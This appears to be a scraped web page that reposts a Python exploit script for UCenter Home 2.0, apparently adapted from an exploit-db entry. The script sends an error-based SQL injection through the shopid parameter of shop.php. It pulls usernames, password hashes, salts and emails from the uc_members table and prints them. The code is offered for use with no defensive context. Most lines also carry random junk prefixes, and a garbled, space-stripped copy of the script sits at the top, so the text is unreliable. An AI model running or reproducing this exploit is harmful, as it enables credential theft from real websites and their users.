UCenter Home 2.0 EXP

admin

#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl

8 w+ \: J0 o2 y5 ^* V
#!/usr/bin/env python  

import sys  
import urllib2  
import re  

1 h- ?- K% r: g' zdef info():  
    print 'From:http://www.exploit-db.com/exploits/14997/'
0 D/ n. g" z+ q) U4 }9 X    print 'http://www.hake.cc/Web_loudong/'
% F: L- e: q' k! T- W    print 'changed:qiaoy'  
& M+ k8 e1 ?/ k- z    print 'exp:'  
, b4 h# c% ], l3 V    print ' ./UCenter_Home_2.0.py site'  

5 w( \( U, y8 p" u1 f3 Z/ q, Cdef main():  
    if len(sys.argv) != 2:  
9 `/ G' p6 `  G' Y        info()  
    else:  
$ P' `' j& q0 i2 r, |6 @5 C        site = sys.argv[1]  
        if site[0:7] == 'http://':  
) m" o# v: h3 n% ]  Y( H            sitesite =site  
        elif site[0:8] == 'https://':  
            sitesite = site  
4 u& B+ d9 u7 k5 E! R$ \        else:  
            site = 'http://'+site  
        try:  
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
" t3 [* [  |! p- X$ `. C9 S( o            Value = urllib2.urlopen(url).read()  
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
            hacked = Msg.split(':')  
! T3 X9 p( h% o7 K* O            print 'Name:    '+hacked[1]  
! `6 j  M+ C# a3 C% {            print 'Passwd:  '+hacked[2]  
            print 'salt:    '+hacked[3]  
) ^8 P- o% g5 a# ~            print 'email:   '+hacked[4]  
- C9 R8 ?2 c$ u$ J5 H        except:  
            print 'Sorry,I can\'t work............'  
4 d4 c1 T6 s6 J% g4 {
if __name__ == '__main__':  
    main()